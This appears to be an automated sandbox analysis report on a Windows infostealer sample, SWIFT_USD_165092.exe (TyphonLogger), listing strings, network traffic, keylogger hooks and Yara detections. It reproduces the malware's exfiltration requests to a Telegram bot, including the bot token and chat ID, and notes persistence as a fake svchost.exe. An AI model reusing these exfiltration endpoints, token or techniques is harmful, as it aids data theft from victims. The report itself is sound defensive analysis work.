                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.costura.pdb.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dotnetzip
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.dotnetzip.dll.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.dotnetzip.pdb.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: system.runtime.interopservices.runtimeinformation
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.system.runtime.interopservices.runtimeinformation.dll.compressed
                    Source: SWIFT_USD_165092.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknown HTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe File created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txt
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe File created: C:\Users\user\AppData\Local\Logs\22-05-2023\Installed Software.txt
                    Source: SWIFT_USD_165092.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mscorlib.pdbMZ source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Core.ni.pdbRSDSD source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Accessibility.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdbSystem.Net.Http.dllXs source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb.0 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: costura.costura.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdbmscorlib.ni.dllp source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Net.Http.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.548491096.0000000006AC0000.00000004.08000000.00040000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.533583456.00000000039C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver327 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Configuration.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbO source: SWIFT_USD_165092.exe, 00000001.00000002.548199153.000000000623B000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000AE5000.00000004.00000020.00020000.00000000.sdmp, WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000002.547387044.000000000619A000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Management.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Drawing.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.pdb3 source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\mscorlib.pdb source: SWIFT_USD_165092.exe, 00000001.00000003.506792457.00000000061F3000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q costura.dotnetzip.pdb.compressed source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.650586670.0000000003241000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: DotNetZip.pdb source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B19000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Net.Http.ni.pdbRSDS source: WER14F4.tmp.dmp.37.dr
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb6 source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER14F4.tmp.dmp.37.dr

                    Networking

                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Domain query: 245.246.1.0.in-addr.arpa
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Network Connect: 149.154.167.220 443
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Domain query: ipapi.co
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Domain query: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Domain query: api.telegram.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Network Connect: 173.231.16.76 80
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Network Connect: 172.67.69.226 443
                    Source: unknown DNS query: name: api.telegram.org
                    Source: unknown DNS query: name: api.telegram.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\Desktop\SWIFT_USD_165092.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe DNS query: name: api.ipify.org
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe DNS query: name: api.ipify.org
                    Source: Yara match File source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE
                    Source: Malware configuration extractor URLs: https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171
                    Source: global traffic HTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1 Content-Type: multipart/form-data; boundary="0c552aff-97a1-416c-92c5-e86524fa2be5" Host: api.telegram.org Content-Length: 778795 Expect: 100-continue
                    Source: global traffic HTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1 Content-Type: multipart/form-data; boundary="65055caf-f467-42d1-9569-ad240200e71b" Host: api.telegram.org Content-Length: 554301 Expect: 100-continue
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org/
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org4Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.orgD8Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.521846828.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.650106846.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002E91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Amcache.hve.37.dr String found in binary or memory: http://upx.sf.net
                    Source: svchost.exe, 0000000E.00000002.662208925.0000000004155000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.codeplex.com/DotNetZip
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000311D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003341000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003354000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=16890
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.00000000028A9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4Dp
                    Source: svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org4Dp(
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.000000000287B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipapi.co/84.17.52.45/json
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.000000000287B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ipapi.co4Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.479687735.00000000061C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://java.sun.com
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                    Source: SWIFT_USD_165092.exe, svchost.exe.9.dr String found in binary or memory: https://subf.domfagdfa6ffaffiffn.comd/objecsts.json?api_key=123R
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/typho
                    Source: svchost.exe, 0000000E.00000002.651681057.0000000003356000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/typhon_shop
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.533583456.0000000003B06000.00000004.00000800.00020000.00000000.sdmp, SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.662208925.0000000004012000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002F49000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.0000000002EF9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000332E000.00000004.00000800.00020000.00000000.sdmp, DotNetZip-cmmx3b12.tmp.1.dr, DotNetZip-dd5sgyyl.tmp.14.dr String found in binary or memory: https://t.me/typhon_shop.
                    Source: SWIFT_USD_165092.exe, 00000001.00000002.524320725.0000000002DDC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.651681057.000000000335A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t.me/typhon_shopD8Dp
                    Source: SWIFT_USD_165092.exe, 00000001.00000003.481034503.000000000624E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.589310813.00000000055C8000.00000004.00000020.00020000.00000000.sdmp, 2956d154-79a0-458c-9507-f5de6e62dd96.1.dr, acf092cf-e9ca-4ee8-8b91-35872d9c173c.14.dr, b65d24f6-721c-4e3e-aed6-0778bb2b440a.14.dr, b7fbbbd0-cab3-4baf-a44e-1add614b7f64.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: unknown HTTP traffic detected: POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1 Content-Type: multipart/form-data; boundary="0c552aff-97a1-416c-92c5-e86524fa2be5" Host: api.telegram.org Content-Length: 778795 Expect: 100-continue
                    Source: unknown DNS traffic detected: queries for: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET /84.17.52.45/json HTTP/1.1 User-Agent: ipapi.co /#c-sharp-v1.03 Host: ipapi.co Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /84.17.52.45/json HTTP/1.1 User-Agent: ipapi.co /#c-sharp-v1.03 Host: ipapi.co Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: api.ipify.org
                    Source: unknown HTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49718 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 172.67.69.226:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49727 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/Keylogger/MainModule.cs .Net Code: SetHook
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, Log/Modules/Keylogger/MainModule.cs .Net Code: KeyboardLayout
                    Source: C:\Users\user\AppData\Roaming\svchost\svchost.exe Code function: 14_2_053BB690 SetWindowsHookExW 0000000D,00000000,?,?
                    Source: SWIFT_USD_165092.exe, 00000000.00000002.398773484.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                    System Summary

                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing many base64-encoded IR and analysis tools names Author: ditekSHen
                    Source: SWIFT_USD_165092.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 1.2.SWIFT_USD_165092.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
                    Source: 0.2.SWIFT_USD_165092.exe.3e61140.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_References_SecTools_B64Encoded author = ditekSHen, description = Detects executables referencing many base64-encoded IR and analysis tools names
